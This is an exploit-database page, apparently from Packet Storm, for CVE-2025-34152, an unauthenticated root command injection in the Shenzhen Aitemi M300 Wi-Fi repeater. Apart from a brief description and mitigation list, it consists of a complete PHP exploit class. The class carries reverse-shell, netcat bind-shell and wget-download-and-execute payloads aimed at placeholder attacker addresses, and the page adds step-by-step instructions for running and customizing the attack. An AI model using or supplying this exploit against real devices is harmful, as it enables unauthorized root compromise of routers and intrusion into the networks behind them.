Share
## https://sploitus.com/exploit?id=PACKETSTORM:215871
=============================================================================================================================================
    | # Title     : Shenzhen Aitemi M300 Wi-Fi Repeater PHP Code Exploit                                                                        |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |
    | # Vendor    : https://www.ebay.com/itm/404211745927                                                                                       |
    =============================================================================================================================================
    
    POC : 
    
    [+] General Information
    ----------------------
    - Vulnerability Name: Shenzhen Aitemi M300 Wi-Fi Repeater โ€“ Unauthenticated RCE (https://packetstorm.news/files/id/209361/)
    - CVE ID: CVE-2025-34152
    - Vulnerability Type: Remote Command Injection โ€“ Unauthenticated
    - Privilege Level: Root
    - Severity: Critical (10/10)
    
    2. Vulnerability Description
    ----------------------------
    The Shenzhen Aitemi M300 Wi-Fi Repeater (hardware model MT02) contains an unauthenticated
    remote command injection vulnerability in the "time" parameter handled by:
    
        protocol.csp?fname=system&opt=time_conf&function=set
    
    The parameter is passed directly into:
    
        date -s "$time"
    
    Because user-supplied input is unsanitized, an attacker can inject backtick-executed
    shell commands:
    
        time=`COMMAND`
    
    These commands execute with full root privileges without requiring authentication.
    
    3. Exploitation
    ----------------
    Example malicious injection:
    
        time=`sh -i >& /dev/tcp/ATTACKER_IP/4444 0>&1`
    
    URL-encoded version:
    
        time=%60sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2FIP%2F4444%200%3E%261%60
    
    The payload is delivered through an unauthenticated POST request.
    
    4. Security Impact
    ------------------
    - Full remote command execution as root
    - No authentication required
    - No reboot needed
    - Immediate full compromise of the device
    - Allows uploading, downloading, deleting files
    - Enables persistent backdoors
    - May give access to the entire network environment
    
    5. Recommendations
    ------------------
    - Update firmware as soon as possible
    - Restrict access to port 80
    - Place the device behind a firewall/WAF
    - Avoid exposing the repeater to WAN environments
    
    ===================================================================
    6. Full Converted PHP Exploit Code
    ===================================================================
    
    <?php
    
    class AitemiM300_Advanced {
    
        private $target;
        private $port;
        private $path;
        private $logFile = "exploit-log.txt";
    
        public function __construct($target, $port = 80, $path = "/") {
            $this->target = rtrim($target, '/');
            $this->port = $port;
            $this->path = $path;
        }
    
        private function log($txt) {
            file_put_contents($this->logFile, "[" . date("Y-m-d H:i:s") . "] $txt\n", FILE_APPEND);
        }
    
        private function sendReq($method, $uri, $data = null, $headers = []) {
            $url = "http://{$this->target}:{$this->port}{$uri}";
            $ch = curl_init($url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
    
            if ($data) curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
            if ($headers) curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
    
            $body = curl_exec($ch);
            $code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
            curl_close($ch);
    
            $this->log("HTTP $method $uri => Code $code");
            return ['body' => $body, 'code' => $code];
        }
    
        public function check() {
    
            $res = $this->sendReq("GET", "/favicon.ico");
    
            if ($res['code'] !== 200) {
                return "SAFE: favicon.ico missing โ€“ likely not vulnerable.";
            }
    
            $hash = hash("sha256", $res['body']);
            if ($hash === "eed1926b9b10ed9c54de6215dded343d066f7e447a7b62fe9700b7af4b34d8ee") {
                return "โœ“ Appears: Aitemi M300 device confirmed.";
            }
    
            return "UNKNOWN: Unable to verify device identity.";
        }
    
        public function exploit($cmd) {
    
            $raw  = "`$cmd`";
            $enc  = urlencode($raw);
            $enc  = str_replace("+", "%20", $enc);
    
            $data = "fname=system&opt=time_conf&function=set&time=$enc";
    
            $headers = [
                "Content-Type: application/x-www-form-urlencoded"
            ];
    
            return $this->sendReq("POST", "/protocol.csp?", $data, $headers);
        }
    
        public function payload_reverse_shell($ip, $port) {
            return "sh -i >& /dev/tcp/$ip/$port 0>&1";
        }
    
        public function payload_bind_shell($port = 4444) {
            return "nc -lp $port -e /bin/sh";
        }
    
        public function payload_mips_wget($url) {
            return "wget $url -O /tmp/x; chmod +x /tmp/x; /tmp/x";
        }
    
        public function payload_pingback($ip) {
            return "ping -c 1 $ip";
        }
    
        public function run_payload($payload) {
            return $this->exploit($payload);
        }
    
    }
    
    // Example Usage:
    $exp = new AitemiM300_Advanced("192.168.1.1");
    
    echo $exp->check() . "\n";
    
    $payload = $exp->payload_reverse_shell("192.168.1.100", 4444);
    $exp->run_payload($payload);
    
    echo "โœ“ Payload sent...\n";
    ?>
    
    ===================================================================
    7. How To Save And Execute The PHP Exploit Code
    ===================================================================
    
    Follow the steps below to properly save and run the converted PHP exploit code.
    
    1. Saving The Exploit
    ---------------------
    - Open a text editor such as Notepad, Notepad++, Sublime Text, or VSCode.
    - Copy the full PHP exploit code block from section 6.
    - Save the file as:
    
        aitemi_m300_rce.php
    
    - Make sure the file extension is `.php` and the encoding is UTFโ€‘8.
    
    2. Preparing The Environment
    ----------------------------
    The exploit requires:
    - PHP 7.x or PHP 8.x installed.
    - cURL support enabled (phpโ€‘curl extension).
    - Internet / network access to the target device.
    
    Check PHP version:
    
        php -v
    
    Check curl module:
    
        php -m | findstr curl   (Windows)
        php -m | grep curl       (Linux)
    
    3. Running The Exploit (Windows)
    --------------------------------
    Open Command Prompt or PowerShell:
    
        cd C:\path\to\exploit\
        php aitemi_m300_rce.php
    
    4. Running The Exploit (Linux / macOS)
    --------------------------------------
    Terminal:
    
        cd /path/to/exploit/
        php aitemi_m300_rce.php
    
    Run in background:
    
        nohup php aitemi_m300_rce.php &
    
    5. Customizing Payloads
    -----------------------
    Modify:
    
        $exp = new AitemiM300_Advanced("192.168.1.1");
    
    Reverse shell:
    
        $payload = $exp->payload_reverse_shell("YOUR_IP", 4444);
    
    Bind shell:
    
        $payload = $exp->payload_bind_shell(5555);
    
    MIPS wget payload:
    
        $payload = $exp->payload_mips_wget("http://YOUR_IP/mips.bin");
    
    Execute:
    
        $exp->run_payload($payload);
    
    6. Verifying RCE
    ----------------
    - Reverse shell connection  
    - Pingback  
    - exploit-log.txt  
    - Observed device behavior  
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================